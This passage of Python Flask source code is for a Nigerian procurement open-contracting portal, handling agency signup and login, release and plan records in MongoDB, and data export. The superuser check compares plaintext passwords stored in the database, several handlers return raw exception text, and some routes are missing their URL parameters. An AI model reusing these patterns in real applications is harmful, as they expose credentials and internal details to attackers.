\"\",\n \"variation\": \"\",\n 
\"bppapprovalvariation\": \"\",\n \"variationamount\": \"\",\n \"revisedestimatedcontractamount\": \"\",\n \"tilldate\": \"\",\n \"milestones\":\n {\n \"description\": \"0.7\",\n \"status\": \"On-Going\"\n }\n\n }\n }\n\n }\n return rl\n\n##creates an ocds formatted json data model\n\ndef past(date):\n if date==\"\":\n return False\n return date < datetime.datetime.strptime(datetime.date.today().strftime(\"%d-%m-%y\"), '%d-%m-%y').date()\n\n\napp.add_template_global(js, name='js')\napp.add_template_global(past, name='past')\napp.add_template_global(intervals, name='interval')\napp.add_template_global(repl, name='repl')\n\n\n###########################################################################################################################################################User Validation fUNCTIONS########################################################\n\n\ndef super_validate(username, password):\n\n checked = db.admins.find_one({\"username\": username, \"password\": password})\n if checked:\n return True\n else:\n return False\n\n\n# download planning document\n########################################helper functions####################################################\n\n\n###################################################################views#######################################################################'\n##displays home page##########################################################################################################\n@app.route(\"/\")\ndef home():\n c = connect_db()\n rel = c.releases.find()\n mapdata = []\n return render_template(\"index.html\", rel=rel, mapdata=json.dumps(mapdata))\n\n@app.route(\"/bids\")\n@app.route(\"/tenders\")\ndef bids():\n\n bids = db.releases.find()\n return render_template(\"listings/bids.html\", bids=bids)\n\n@app.route(\"/forcsos\")\ndef forcsos():\n\n contracts = db.releases.find()\n agency_freq = db.releases.aggregate([{\"$group\": {\"_id\": \"buyer.identifier.legalName\", \"count\": {\"$sum\": 1}}}])\n loc_freq = db.releases.aggregate([{\"$group\": {\"_id\": \"tender.procurementMethod\", \"count\": {\"$sum\": 1}}}])\n contractors = db.releases.aggregate([{\"$group\": {\"_id\": \"awards.$.suppliers.name\", \"count\": {\"$sum\": 1}}}])\n db.close\n return render_template(\"listings/forcsos.html\", contracts=contracts, contractors=contractors, loc=loc_freq)\n\n\n@app.route(\"/csos\")\ndef csos():\n\n csos = db.csos.find()\n db.close\n return render_template(\"listings/csos.html\", csos=csos)\n\n\n@app.route(\"/contracts\")\ndef contracts():\n\n contracts = db.releases.find()\n agency_freq = db.releases.aggregate([{\"$group\": {\"_id\": \"buyer.identifier.legalName\", \"count\": {\"$sum\": 1}}}])\n loc_freq = db.releases.aggregate([{\"$group\": {\"_id\": \"tender.procurementMethod\", \"count\": {\"$sum\": 1}}}])\n contractors = db.releases.aggregate([{\"$group\": {\"_id\": \"awards.$.suppliers.name\", \"count\": {\"$sum\": 1}}}])\n db.close\n return render_template(\"listings/contracts.html\", contracts=contracts, contractors=contractors, loc=loc_freq)\n\n\n@app.route(\"/contractors\")\ndef contractors():\n\n contractors = db.releases.aggregate([{\"$group\": {\n \"_id\": {\"contractor\": \"$awards.suppliers.identifier.legalName\", \"buyer\": \"$buyer.identifier.legalName\"},\n \"count\": {\"$sum\": 1},\n \"totalamount\": {\"$sum\": \"$planning.budget.amount\"}}},\n {\"$group\": {\"_id\": {\"contractor\": \"$_id.contractor\",\"buyer\": \"$_id.buyer\"},\n \"totals\": {\n \"$addToSet\": {\"buyer\": \"$_id.buyer\", \"count\": 
\"$count\",\n \"totalamount\": \"$totalamount\"}},\n \"count\": {\"$sum\": \"$count\"}, \"totalamount\": {\"$sum\": \"$totalamount\"}}},\n {\"$group\": {\"_id\": \"$_id.contractor\", \"buyer\": {\n \"$push\": {\"buyer\": \"$_id.buyer\", \"times\": \"$count\",\n \"total\": \"$totalamount\"}}}}, {\"$sort\": {\"buyer.times\": -1}}\n\n ])\n db.close\n\n return render_template(\"listings/contractors.html\", contractors=contractors)\n\n\n\n@app.route(\"/agencies\")\ndef agencies():\n\n\n agents= db.releases.aggregate([{\"$group\": {\"_id\": {\"buyer\":\"$buyer.identifier.legalName\", \"contractor\":\"$awards.suppliers.identifier.legalName\"}, \"count\": {\"$sum\": 1},\n \"totalamount\": {\"$sum\": \"$planning.budget.amount\"}}},\n {\"$group\":{\"_id\":{\"buyer\":\"$_id.buyer\", \"contractor\":\"$_id.contractor\"},\"totals\":{\"$addToSet\":{\"supplier\":\"$_id.contractor\",\"count\":\"$count\", \"totalamount\":\"$totalamount\"}}, \"count\":{\"$sum\":\"$count\"},\"totalamount\":{\"$sum\":\"$totalamount\"}}},\n {\"$group\":{\"_id\":\"$_id.buyer\", \"contractors\":{\"$push\":{\"contractor\":\"$_id.contractor\", \"times\":\"$count\", \"total\":\"$totalamount\"}}}}, {\"$sort\":{\"contractors.times\":-1}}\n\n ])\n\n db.close\n\n return render_template(\"listings/agencies.html\", agents=agents)\n\n\n##################################### USER AUTHENTICATION\n\n# render the signup page once a request comes to /showSignUp\n@app.route('/showSignUp')\ndef showSignUp():\n return render_template('forms/superuser.html')\n\n\n# signup method\n@app.route('/signUp', methods=['POST'])\ndef signUp():\n try:\n # read the posted values from the UI\n _ministry = request.form['ministry_name']\n _agencyName = request.form['agency_name']\n _agencyabbrev = request.form['agency_abb']\n\n _state = request.form['state']\n _city = request.form['agency_locality']\n _street = request.form['agency_street']\n _phonenum = request.form['contactphone']\n _email = request.form['contactemail']\n _fax = request.form['fax']\n _username = request.form['username']\n _password = request.form['password']\n _website = request.form['url']\n country = request.form['country']\n\n # validate the received values\n if _username and _email and _password and _ministry and _agencyName and _agencyabbrev and _state and _city and _phonenum:\n # All Good, let's call MySQL\n\n _hashed_password = generate_password_hash(_password)\n # string concatenation - \"your %s is in the %s\" % (object, location) -- add year and day of the year\n _reference = \"%s%s%s\" % (\n _agencyabbrev, datetime.date.today().strftime(\"%Y\"), datetime.date.today().strftime(\"%j\"))\n\n query = db.mdas.update_one(\n {\"agencyreference\": _reference,\n \"basicdata\": {\"ministry\": _ministry, \"agencyname\": _agencyName, \"agencyabbreviation\": _agencyabbrev},\n \"address\": {\"state\": _state, \"city\": _city, \"streetaddress\": _street, \"country\": country},\n \"contact\": {\"phone\": _phonenum, \"email\": _email, \"fax\": _fax, \"website\": _website},\n \"username\": _username, \"password\": _hashed_password},\n {\"$set\": {\"agencyreference\": _reference, \"basicdata\": {\"ministry\": _ministry, \"agencyname\": _agencyName,\n \"agencyabbreviation\": _agencyabbrev},\n \"address\": {\"state\": _state, \"city\": _city, \"streetaddress\": _street, \"country\": country},\n \"contact\": {\"phone\": _phonenum, \"email\": _email, \"fax\": _fax, \"website\": _website},\n \"username\": _username, \"password\": _hashed_password}},\n upsert=True)\n\n if query.matched_count is 0:\n\n message 
= \"\"\"Thanks for your registration. For your records:\n Your User Name is %s and\n your Agency Reference is %s.\"\"\".replace('\\n', ' ') % (_username, _reference)\n # return json.dumps({'message':'User created successfully !'})\n flash(message)\n return redirect('/registered')\n\n else:\n\n error = 'UserName or Agency Abbreviation already exists. Please review'\n # duplicate where unique\n # return json.dumps({'error':str(data[0])})\n return render_template('dashboard/signup.html', error=error)\n else:\n error = 'Enter the required fields.'\n # check required fields\n # return json.dumps({'html':'Enter the required fields'})\n return render_template('dashboard/signup.html', error=error)\n except Exception as e:\n return json.dumps({'error': str(e)})\n finally:\n db.close\n\n\n@app.route('/registered')\ndef registered():\n return render_template('dashboard/registered.html')\n\n\n# render the signup page once a request comes to /showSignin\n@app.route('/showSignin')\ndef showSignin():\n return render_template('dashboard/signin.html')\n\n\n# signin method\n@app.route('/validateLogin', methods=['POST'])\ndef validateLogin():\n try:\n _username = request.form['inputUsername']\n _password = request.form['inputPassword']\n\n query = db.mdas.find_one({\"username\": _username})\n\n\n if query and check_password_hash(query['password'], _password):\n\n # BSON TO STRING\n # populating session with user info\n session['user'] = str(query['_id'])\n\n session['username'] = query['username']\n\n session['agencyName'] = query['basicdata']['agencyname']\n\n session['reference'] = query['agencyreference']\n\n flash('You were successfully logged in')\n return redirect('/userHome')\n else:\n return render_template('dashboard/signin.html', error='Wrong UserName or Password.')\n\n\n except Exception as e:\n return render_template('dashboard/signin.html', error=str(e))\n finally:\n db.close\n\n\n#user dashboard on successful login with user id for session taken from login method\n@app.route('/userHome')\ndef userHome():\n if session.get('user'):\n return render_template('dashboard/userHome.html')\n else:\n return render_template('dashboard/error.html',error = 'Unauthorized Access')\n\n\n\n@app.route(\"/agency_registration\")\ndef agency_registration():\n return render_template(\"forms/superuser.html\")\n\n\n@app.route(\"/superuser\", methods=['GET', 'POST'])\ndef superuser():\n username = request.form['superusername']\n password = request.form['password']\n\n if username and password and super_validate(username, password):\n return render_template(\"dashboard/signup.html\")\n else:\n return render_template(\"forms/superuser.html\", error=\"Please fill in the correct details\")\n##################################### END OF USER AUTHENTICATION\n\n\n\n\n\n@app.route(\"/contact\")\ndef contact():\n return(render_template(\"forms/contact.html\"))\n\n\n@app.route(\"/messagefrom/\", methods=['GET', 'POST'])\ndef messagefrom(page):\n if request.method == 'POST':\n firstname = request.form.get('firstname', '')\n lastname = request.form.get('lastname','')\n organization = request.form.get('organization','')\n email = request.form.get('email','')\n phone = str(request.form.get('phone',''))\n subject = request.form.get('subject','').upper()\n message = request.form.get('message','')\n\n if message:\n\n msg = Message(message, sender='app@nigeriaoc.org', recipients=['app@nigeriaoc.org', 'eneyibabe@gmail.com'])\n msg.body = \"\"\"\n From: %s \\n Email: <%s>\\n To: The Public Bureau of Procurement\\n Subject: %s \\n\\n 
Message \\n %s\\n\\n\n Contact back Phone on : %s or by email on %s\n \"\"\" % (firstname + \" \" + lastname, email, subject, message, phone, email)\n mail.send(msg)\n flash(\"Your Enquiry has been sent. A BPP staff would be in contact with you Shortly\")\n return redirect(url_for(page))\n else:\n flash(\"You must fill in a message to send an enquiry\")\n return redirect(url_for('contact'))\n return redirect(url_for(page))\n\n\n##3DISPLAYS BPP process page\n@app.route(\"/bppprocess\")\ndef bppprocess():\n return render_template(\"displays/process.html\")\n\n\n\n###########################################################################################################################################################API########################################################\n@app.route(\"/open_api\")\n@app.route(\"/overview\")\ndef overview():\n\n contracts = db.releases.find()\n db.close\n return render_template(\"reports/overview.html\", contracts=contracts)\n\n\n \n@app.route(\"/release/\",methods=['GET', 'POST'])\ndef downloadocid(ocid):\n\n todays_date = datetime.datetime.now().strftime('%Y-%m-%dT%H:%M:%SZ')\n matches = list(db.releases.find({\"ocid\":ocid}))\n for i in matches:\n i.pop(\"_id\")\n db.close\n matches = {\n \"uri\":\"http:nigeriaoc.org/releases/\"+ocid, \n \"publishedDate\":todays_date,\n \"publisher\":\n {\"scheme\":\"NGA-COH\",\n \"name\":\"Public Bureau of Procurement\",\n \"uri\":\"http://www.bpp.gov.ng\"\n \n },\n \"license\":\"https://opendatacommons.org/licenses/pddl/1.0/\",\n \"publicationPolicy\":\"https://github.co/open-contracting/sample-data/\",\n \"releases\":matches\n }\n \n return jsonify(matches)\n \n\n@app.route(\"/downloadSelected\", methods=['GET', 'POST'])\ndef downloadSelected():\n data = request.form.getlist('checks')\n format = request.form.get('options','')\n filename = 'releases' + ''.join([random.choice(\"0123455boleandgroundnutnagodennoshedadaniwazobia\") for i in range(0, 5)])\n todays_date = datetime.datetime.now().strftime('%Y-%m-%dT%H:%M:%SZ')\n\n if format == 'csv' or format == 'allcsv':\n filename = filename+\".csv\"\n file_loc = \"/home/ubuntu/flaskapp/static/data/final1.csv\"\n with open(file_loc, \"r\") as ff:\n lines = ff.read().decode('utf-8',\"replace\")\n ff.close()\n\n if format == 'allcsv':\n response = make_response(lines.encode(\"utf-8\").strip())\n response.headers['Content-Disposition'] = 'attachment; filename=' + filename\n else:\n rows = [i for i in lines.split(\"\\n\")]\n cells = [i.split(\",\") for i in rows]\n matches = rows[0] + \"\\n\" + '\\n'.join([s for s in rows if any(ocid in s for ocid in data)])\n response = make_response(matches.encode(\"utf-8\").strip())\n response.headers['Content-Disposition'] = 'attachment; filename=' + filename\n return response\n \n else:\n\n if format == 'alljson' or (format == '' and len(data)==0):\n \n data1 = list(db.releases.find())\n elif format == '' and len(data)==0:\n return jsonify({})\n else:\n data1 = list(db.releases.find({'ocid': {'$in': data}}))\n \n for i in data1:\n i.pop(\"_id\")\n db.close\n\n matches = {\n \"uri\": \"http:nigeriaoc.org/open_api\",\n \"publishedDate\": todays_date,\n \"publisher\":\n {\"scheme\": \"NGA-COH\",\n \"name\": \"Public Bureau of Procurement\",\n \"uri\": \"http://www.bpp.gov.ng\"\n\n },\n \"license\": \"https://opendatacommons.org/licenses/pddl/1.0/\",\n \"publicationPolicy\": \"https://github.co/open-contracting/sample-data/\",\n \"releases\": data1\n }\n return 
jsonify(matches)\n\n\t\t\n############################################################################################################\n\n\n################################### RELEASE\n\n\n# render release form\n@app.route('/showNewRelease')\ndef showNewRelease():\n return render_template('dashboard/release.html')\n\n\n# add release method\n@app.route('/addRelease', methods=['POST'])\ndef addRelease():\n try:\n\n if session.get('user'):\n\n _website = request.form['url']\n _releasetag = request.form['tag']\n _description = request.form['description']\n\n # validate the received values\n if _releasetag and _description:\n # All Good, let's call MySQL\n\n reference = session.get('reference')\n ocds = 'OCDS'\n _releaseID = \"%s-%s-%s-%s\" % (\n ocds, datetime.date.today().strftime(\"%Y\"), reference, strftime(\"%H-%M-%S\"))\n today = datetime.date.today().strftime('%Y-%m-%d')\n username = session.get('username')\n\n _agencyname = session.get('agencyName')\n # string concatenation - \"your %s is in the %s\" % (object, location)\n query = db.releases.update_one({\n \"ocid\": _releaseID,\n \"id\": _releaseID,\n \"description\": _description,\n \"tag\": [\n _releasetag\n ],\n \"buyer\": {\n \"identifier\": {\n \"id\": _releaseID,\n \"name\": _agencyname,\n \"legalName\": _agencyname,\n \"language\": language\n }\n },\n \"website\": _website,\n \"initiationType\": '',\n \"date\": datetime.datetime.strptime(today, \"%Y-%m-%d\"),\n \"language\": language}\n ,\n {\"$set\": {\n \"ocid\": _releaseID,\n \"id\": _releaseID,\n \"description\": _description,\n \"tag\": [\n _releasetag\n ],\n \"buyer\": {\n \"identifier\": {\n \"id\": _releaseID,\n \"name\": _agencyname,\n \"legalName\": _agencyname,\n \"language\": language\n }\n },\n \"website\": _website,\n \"initiationType\": '',\n \"date\": datetime.datetime.strptime(today, \"%Y-%m-%d\"),\n \"language\": language}\n }\n ,\n upsert=True)\n\n if query.matched_count is 0:\n\n message = \"\"\"Thank you %s for your creating a new project release. 
For your records:\n                    The OCID / Release Identification Number is %s and\n                    your Agency Reference is %s.\"\"\".replace('\\n', ' ') % (username, _releaseID, reference)\n\n                    flash(message)\n                    return redirect('/userHome')\n\n
                else:\n                    # duplicate where unique\n                    return render_template('dashboard/release.html', error='Please review form entry')\n            else:\n                # check required fields\n                return render_template('dashboard/release.html',\n                                       error='Enter project description and choose a release tag/stage.')\n        else:\n            return render_template('dashboard/error.html', error='Unauthorized Access')\n\n
    except Exception as e:\n        return json.dumps({'error': str(e)})\n    finally:\n        pass  # the original's \"db.close\" here was a no-op attribute access\n\n\n#############################################DATA FETCHING METHODS\n\n\n################################### START OF RELEASE MODAL\n# retrieve release method\n@app.route('/getRelease', methods=['POST'])\ndef getRelease():\n    try:\n        if session.get('user'):\n\n
            _agencyName = session.get('agencyName')\n\n            _offset = int(request.form['offset'])\n            _limit = pageLimit\n\n
            releases = db.releases.find({\"buyer.identifier.legalName\": _agencyName}).sort([('_id', -1)]).skip(\n                _offset).limit(_limit)\n\n            res = db.releases.find({\"buyer.identifier.legalName\": _agencyName}).count()\n\n            response = []\n            releases_dict = []\n\n
            # parse the data (python list) and convert it into a dictionary so that it's easy to return as JSON\n            for release in releases:\n                d = release['date']\n                dString = d.strftime(\"%Y-%m-%d\")\n\n
                release_dict = {\n                    'OCID': release['ocid'],\n                    'Project_Description': release['description'],\n                    'Release_Tag': release['tag'],\n                    'Published_Date': dString}\n                releases_dict.append(release_dict)\n\n
            # appended once, after the loop -- the original re-appended the same\n            # list object on every iteration\n            response.append(releases_dict)\n            response.append({'total': res})\n\n            return json.dumps(response)\n\n
        else:\n            return render_template('dashboard/error.html', error='Unauthorized Access')\n    except Exception as e:\n        return render_template('dashboard/error.html', error=str(e))\n\n\n# get particular release information\n@app.route('/getReleaseById', methods=['POST'])\ndef getReleaseById():\n    try:\n        if session.get('user'):\n\n            _id = request.form['id']\n\n
            # find_one returns a single document (or None); the original looped\n            # over it, which iterates the document's KEYS and crashed on\n            # rel['description']\n            release = db.releases.find_one({\"ocid\": _id})\n\n            response = []\n            releases_dict = []\n\n
            if release:\n                releases_dict.append({\n                    'Description': release['description'],\n                    'Tag': release['tag'][0],\n                    'Website': release['website']\n                })\n            response.append(releases_dict)\n\n            return json.dumps(response)\n
        else:\n            return render_template('dashboard/error.html', error='Unauthorized Access')\n    except Exception as e:\n        return render_template('dashboard/error.html', error=str(e))\n\n\n# update release\n@app.route('/updateRelease', methods=['POST'])\ndef updateRelease():\n    try:\n        if session.get('user'):\n            _website = request.form['website']\n            _description = request.form['description']\n            _release_id = 
request.form['id']\n _tag = request.form['tag']\n\n # print(_release_id+\" --------\")\n\n\n\n #####TO DO\n ###THIS SHOULD UPDATE ALL TAGS IN ALL STAGES\n\n query = db.releases.update_one({\"ocid\": _release_id},\n {\n \"$set\":\n {\"tag.0\": _tag,\n \"description\": _description,\n \"website\": _website\n }\n\n })\n\n if query.modified_count is 1:\n\n return json.dumps({'status': 'OK'})\n else:\n return json.dumps({'status': 'ERROR'})\n except Exception as e:\n return json.dumps({'status': 'Unauthorized access'})\n finally:\n db.close\n\n\n# delete release\n@app.route('/deleteRelease', methods=['POST'])\ndef deleteRelease():\n try:\n\n if session.get('user'):\n\n _release_id = request.form['id']\n\n result = db.releases.delete_one({\"ocid\": _release_id})\n\n if result.deleted_count is 1:\n return json.dumps({'status': 'OK'})\n else:\n return json.dumps({'status': 'An Error occured'})\n else:\n return render_template('dashboard/error.html', error='Unauthorized Access')\n except Exception as e:\n return json.dumps({'status': str(e)})\n finally:\n db.close\n\n\n################################### END OF RELEASE MODAL\n\n################################### PLAN\n\n\n# render planning form\n@app.route('/showNewPlan')\ndef showNewPlan():\n return render_template('dashboard/planning.html')\n\n\n# render plan view\n@app.route('/showSavedPlan')\ndef showSavedPlan():\n if session.get('user'):\n return render_template('dashboard/myplans.html')\n else:\n return render_template('dashboard/error.html', error='Unauthorized Access')\n\n\n# add a new plan\n@app.route('/addPlan', methods=['POST'])\ndef addPlan():\n # preqadvertstart=request.form.get('preqadvertstart','')\n # print preqadvertstart\n\n try:\n\n if session.get('user'):\n\n ocid = request.form.get('ocid', '')\n rationale = request.form.get('rationale', '')\n projdesc = request.form.get('projdesc', '')\n packagenum = request.form.get('packagenum', '')\n lot = int(request.form['lot'])\n projtype = request.form.get('projtype', '')\n contrtype = request.form.get('contrtype', '')\n\n procmethod = request.form.get('procmethod', '')\n letterofnoobj = request.form.get('letterofnoobj', '')\n appauthority = request.form.get('appauthority', '')\n selecmethod = request.form.get('selecmethod', '')\n Qualification = request.form.get('Qualification', '')\n Review = request.form.get('Review', '')\n prepbymdastart = request.form.get('prepbymdastart', '')\n prepbymdaend = request.form.get('prepbymdaend', '')\n advertstart = request.form.get('advertstart', '')\n advertend = request.form.get('advertend', '')\n leadbefliststart = request.form.get('leadbefliststart', '')\n leadbeflistend = request.form.get('leadbeflistend', '')\n mdalistapprovestart = request.form.get('mdalistapprovestart', '')\n mdalistapproveend = request.form.get('mdalistapproveend', '')\n shortlistsubmission = request.form.get('shortlistsubmission', '')\n propinvitestart = request.form.get('propinvitestart', '')\n propinviteend = request.form.get('propinviteend', '')\n techpropopen = request.form.get('techpropopen', '')\n subtechEvreportstart = request.form.get('subtechEvreportstart', '')\n subtechEvreportend = request.form.get('subtechEvreportend', '')\n mdaapptechEvreportstart = request.form.get('mdaapptechEvreportstart', '')\n mdaapptechEvreportend = request.form.get('mdaapptechEvreportend', '')\n Openingfinancialpropstart = request.form.get('Openingfinancialpropstart', '')\n evalfinproposalst = request.form.get('submissionevareportstart', '')\n evalfinproposalend = 
request.form.get('submissionevareportend', '')\n Negotiationsstart = request.form.get('Negotiationsstart', '')\n Negotiationsend = request.form.get('Negotiationsend', '')\n Negotiationappobjectstart = request.form.get('Negotiationappobjectstart', '')\n Negotiationappobjectstartend = request.form.get('Negotiationappobjectstartend', '')\n planndcertnoobjstart = request.form.get('planndcertnoobjstart', '')\n planndcertnoobjend = request.form.get('planndcertnoobjend', '')\n biddocstart = request.form.get('biddocstart', '')\n biddocend = request.form.get('biddocend', '')\n\n preqadvertstart = request.form.get('preqadvertstart', '')\n preqadvertend = request.form.get('preqadvertend', '')\n Prequalificationopen = request.form.get('Prequalificationopen', '')\n Prequalificationstart = request.form.get('Prequalificationstart', '')\n Prequalificationend = request.form.get('Prequalificationend', '')\n Prequalificationappobjectstart = request.form.get('Prequalificationappobjectstart', '')\n Prequalificationappobjectend = request.form.get('Prequalificationappobjectend', '')\n Prequalificationpubl = request.form.get('Prequalificationpubl', '')\n firstbidstart = request.form.get('firstbidstart', '')\n firstbidend = request.form.get('firstbidend', '')\n secondbidstart = request.form.get('secondbidstart', '')\n secondbidend = request.form.get('secondbidend', '')\n bidinvite = request.form.get('bidinvite', '')\n bidclose = request.form.get('bidclose', '')\n bidevalrepstart = request.form.get('bidevalrepstart', '')\n bidevalrepend = request.form.get('bidevalrepend', '')\n bidevalMDAstart = request.form.get('bidevalMDAstart', '')\n bidevalMDAend = request.form.get('bidevalMDAend', '')\n certnoobjectstart = request.form.get('certnoobjectstart', '')\n certnoobjectend = request.form.get('certnoobjectend', '')\n fecapprovestart = request.form.get('fecapprovestart', '')\n fecapproveend = request.form.get('fecapproveend', '')\n controfferstart = request.form.get('controfferstart', '')\n controfferend = request.form.get('controfferend', '')\n contrsignstart = request.form.get('contrsignstart', '')\n contrsignend = request.form.get('contrsignend', '')\n Mobilizationstart = request.form.get('Mobilizationstart', '')\n Mobilizationend = request.form.get('Mobilizationend', '')\n draftreptstart = request.form.get('draftreptstart', '')\n finalreptstart = request.form.get('finalreptstart', '')\n arrivalgoodsstart = request.form.get('arrivalgoodsstart', '')\n arrivalgoodsend = request.form.get('arrivalgoodsend', '')\n substcomplend = request.form.get('substcomplend', '')\n finalacceptstart = request.form.get('finalacceptstart', '')\n finalacceptend = request.form.get('finalacceptend', '')\n\n Publishplanornot = request.form.get('Publishplanornot', '')\n plsjustify = request.form.get('plsjustify', '')\n\n budgsource = request.form.get('budgsource', '')\n Budgetcode = request.form.get('Budgetcode', '')\n Budgetdesc = request.form.get('Budgetdesc', '')\n Budget = int(request.form.get('Budget', ''))\n estimatedamt = int(request.form.get('estimatedamt', ''))\n\n query = db.releases.find_one({\"ocid\": ocid})\n\n if ocid and query:\n\n # validate ocid\n\n # check mandatory fields / basic data not null\n\n if rationale and projdesc and projtype and Budget and estimatedamt and Budgetcode and Publishplanornot:\n\n query = db.releases.update_one({\"ocid\": ocid},\n {\n \"$set\":\n\n {\"planning.identity.rationale\": rationale,\n \"planning.identity.description\": projdesc,\n \"planning.identity.package\": packagenum,\n 
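# MongoDB dotted-path updates: each key in this $set rewrites only\n                                                # the named nested field -- e.g. {\"$set\": {\"planning.identity.lot\": 2}}\n                                                # updates planning.identity.lot in place and leaves its sibling keys\n                                                # untouched -- which is why the whole planning subtree is not resent here.\n                                                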
\"planning.identity.lot\": lot,\n\n \"planning.budget.project\": projdesc,\n \"planning.budget.description\": projdesc,\n\n \"planning.budget.id\": ocid,\n \"planning.budget.value.currency\": 'NGN',\n\n \"planning.budget.value.description\": Budgetdesc,\n \"planning.budget.value.code\": Budgetcode,\n \"planning.budget.value.source\": budgsource,\n \"planning.budget.value.amount\": Budget,\n \"planning.budget.value.estimate\": estimatedamt,\n\n \"planning.basicdata.procurementcategory\": projtype,\n \"planning.basicdata.contracttype\": contrtype,\n \"planning.basicdata.procurementmethod\": procmethod,\n \"planning.basicdata.letterofobjection\": letterofnoobj,\n \"planning.basicdata.approvalauthority\": appauthority,\n \"planning.basicdata.selectionmethod\": selecmethod,\n \"planning.basicdata.qualification\": Qualification,\n \"planning.basicdata.reviewtype\": Review,\n \"planning.scheduling.requestforproposalstart\": parse_datetime(\n prepbymdastart),\n \"planning.scheduling.requestforproposalend\": parse_datetime(\n prepbymdaend),\n\n \"planning.scheduling.plannedadvert\": parse_datetime(\n advertstart),\n \"planning.scheduling.plannedadvertend\": parse_datetime(\n advertend),\n \"planning.scheduling.plannedevaluation\": parse_datetime(\n leadbefliststart),\n \"planning.scheduling.plannedevaluationend\": parse_datetime(\n leadbeflistend),\n \"planning.scheduling.plannedshortlistapprove\": parse_datetime(\n mdalistapprovestart),\n \"planning.scheduling.plannedshortlistapproveend\": parse_datetime(\n mdalistapproveend),\n \"planning.scheduling.plannedshortlistpublish\": parse_datetime(\n shortlistsubmission),\n \"planning.scheduling.plannedproposalinvite\": parse_datetime(\n propinvitestart),\n \"planning.scheduling.plannedproposalinviteend\": parse_datetime(\n propinviteend),\n \"planning.scheduling.plannedopeningoftechprop\": parse_datetime(\n techpropopen),\n \"planning.scheduling.plannedevaluationtech\": parse_datetime(\n subtechEvreportstart),\n \"planning.scheduling.plannedevaluationtechend\": parse_datetime(\n subtechEvreportend),\n \"planning.scheduling.plannedevaluationtechapprov\": parse_datetime(\n mdaapptechEvreportstart),\n \"planning.scheduling.plannedevaluationtechapprovend\": parse_datetime(\n mdaapptechEvreportend),\n \"planning.scheduling.plannedopenfinancialprop\": parse_datetime(\n Openingfinancialpropstart),\n \"planning.scheduling.plannedsubmittechreport\": parse_datetime(\n evalfinproposalst),\n \"planning.scheduling.plannedsubmittechreportend\": parse_datetime(\n evalfinproposalend),\n \"planning.scheduling.plannednegotiations\": parse_datetime(\n Negotiationsstart),\n \"planning.scheduling.plannednegotiationsend\": parse_datetime(\n Negotiationsend),\n \"planning.scheduling.plannedprocuringenteval\": parse_datetime(\n Negotiationappobjectstart),\n \"planning.scheduling.plannedprocuringentevalend\": parse_datetime(\n Negotiationappobjectstartend),\n \"planning.scheduling.plannedcertificateobj\": parse_datetime(\n planndcertnoobjstart),\n \"planning.scheduling.plannedcertificateobjend\": parse_datetime(\n planndcertnoobjend),\n \"planning.scheduling.biddingdocsstart\": parse_datetime(\n biddocstart),\n \"planning.scheduling.biddingdocsend\": parse_datetime(\n biddocend),\n\n \"planning.scheduling.biddingdocument\": \" \",\n\n \"planning.scheduling.plannedadvertprequal\": parse_datetime(\n preqadvertstart),\n \"planning.scheduling.plannedadvertprequalend\": parse_datetime(\n preqadvertend),\n \"planning.scheduling.plannedprequalopening\": parse_datetime(\n 
Prequalificationopen),\n \"planning.scheduling.plannedevalpreqalsubm\": parse_datetime(\n Prequalificationstart),\n \"planning.scheduling.plannedevalpreqalsubmend\": parse_datetime(\n Prequalificationend),\n \"planning.scheduling.plannedprequalapprov\": parse_datetime(\n Prequalificationappobjectstart),\n \"planning.scheduling.plannedprequalapprovend\": parse_datetime(\n Prequalificationappobjectend),\n \"planning.scheduling.plannedprequalpublish\": parse_datetime(\n Prequalificationpubl),\n \"planning.scheduling.plannedfirstbid\": parse_datetime(\n firstbidstart),\n \"planning.scheduling.plannedfirstbidend\": parse_datetime(\n firstbidend),\n \"planning.scheduling.plannedsecondbid\": parse_datetime(\n secondbidstart),\n \"planning.scheduling.plannedsecondbidend\": parse_datetime(\n secondbidend),\n \"planning.scheduling.plannedbidinvite\": parse_datetime(\n bidinvite),\n \"planning.scheduling.plannedbidclose\": parse_datetime(\n bidclose),\n \"planning.scheduling.plannedbidevaluation\": parse_datetime(\n bidevalrepstart),\n \"planning.scheduling.plannedbidevaluationend\": parse_datetime(\n bidevalrepend),\n \"planning.scheduling.plannedprocuringenteval\": parse_datetime(\n bidevalMDAstart),\n \"planning.scheduling.plannedprocuringentevalend\": parse_datetime(\n bidevalMDAend),\n \"planning.scheduling.plannedcertificateobjevalreport\": parse_datetime(\n certnoobjectstart),\n \"planning.scheduling.plannedcertificateobjevalreportend\": parse_datetime(\n certnoobjectend),\n \"planning.scheduling.plannedfecapproval\": parse_datetime(\n fecapprovestart),\n \"planning.scheduling.plannedfecapproval\": parse_datetime(\n fecapproveend),\n \"planning.scheduling.plannedcontractoffer\": parse_datetime(\n controfferstart),\n \"planning.scheduling.plannedcontractofferend\": parse_datetime(\n controfferend),\n \"planning.scheduling.plannedcontractsignature\": parse_datetime(\n contrsignstart),\n \"planning.scheduling.plannedcontractsignatureend\": parse_datetime(\n contrsignend),\n \"planning.scheduling.plannedmobilization\": parse_datetime(\n Mobilizationstart),\n \"planning.scheduling.plannedmobilizationend\": parse_datetime(\n Mobilizationend),\n \"planning.scheduling.plannedsubmissiondraftrep\": parse_datetime(\n draftreptstart),\n \"planning.scheduling.plannedsubmissionfinalrep\": parse_datetime(\n finalreptstart),\n \"planning.scheduling.plannedgoodsarrival\": parse_datetime(\n arrivalgoodsstart),\n \"planning.scheduling.plannedgoodsarrivalend\": parse_datetime(\n arrivalgoodsend),\n \"planning.scheduling.plannedsubstantialcomplete\": parse_datetime(\n substcomplend),\n \"planning.scheduling.plannedfinalaccept\": parse_datetime(\n finalacceptstart),\n \"planning.scheduling.plannedfinalacceptend\": parse_datetime(\n finalacceptend),\n \"planning.publishplan\": Publishplanornot,\n \"planning.justification\": plsjustify,\n \"planning.date\": datetime.datetime.strptime(today,\n \"%Y-%m-%d\")\n }\n\n })\n\n if query.modified_count is 1:\n\n message = \"\"\"Your Plan with OCID '%s' has been saved.\"\"\".replace('\\n', ' ') % (ocid)\n # return json.dumps({'message':'User created successfully !'})\n flash(message)\n return render_template('dashboard/planning.html')\n else:\n # duplicate where unique\n # return json.dumps({'error':str(data[0])})\n return render_template('dashboard/planning.html',\n error='Please review form entry, one or more entries might be in the wrong format')\n else:\n # check required fields\n # return json.dumps({'html':'Enter the required fields'})\n return 
